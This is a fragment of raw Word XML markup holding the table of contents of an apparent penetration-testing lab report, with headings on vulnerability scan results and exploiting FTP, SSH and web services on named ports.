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3A3D15">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2E1C111F" w14:textId="359D4695" w:rsidR="00DA362E"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118288" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Resources</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118288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05C9922E" w14:textId="1BD038ED" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118289" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Web references</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118289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20F99FDE" w14:textId="1F0D68FA" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118290" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Reports must-read.</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118290 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2376C11F" w14:textId="60953EE0" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118291" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>GVM Summary of issues</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118291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1DDB81F4" w14:textId="307E0893" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118292" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Ports</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118292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09153041" w14:textId="5A36A613" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118293" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Applications</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118293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0CE8F373" w14:textId="5F283ABD" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118294" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Operating sytem</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118294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5FD04157" w14:textId="69309734" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118295" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>CVE’s detected.</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118295 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="53679A25" w14:textId="675C1FCD" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118296" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Running netdiscover</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118296 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48915ABA" w14:textId="69CF8E1F" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118297" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 1524</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118297 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0B5270E2" w14:textId="3EE7265B" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118298" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Ports 513</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118298 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="74C1435F" w14:textId="63B972BB" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118299" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Exploitng Port 21 FTP</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118299 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="35429956" w14:textId="297F309F" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118300" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 2121 NVT: FTP Brute Force Logins Reporting</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118300 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="57013B9A" w14:textId="3FFE4624" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118301" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 22 Exploiting Open SSH</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118301 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="65586819" w14:textId="4C313222" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118302" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 80  Web</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118302 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0B9E692B" w14:textId="727F700F" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118303" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>tikiwiki_graph_formula_exec</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118303 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5735412E" w14:textId="633A4F52" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118304" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>TWiki is prone to Cross-Site Scripting (XSS) and Command Execution Vulnerabilities.</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118304 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31126225" w14:textId="2D91549C" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118305" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Misconfigured web servers allows remote clients to perform dangerous HTTP methods such as PUT and DELETE.</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118305 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
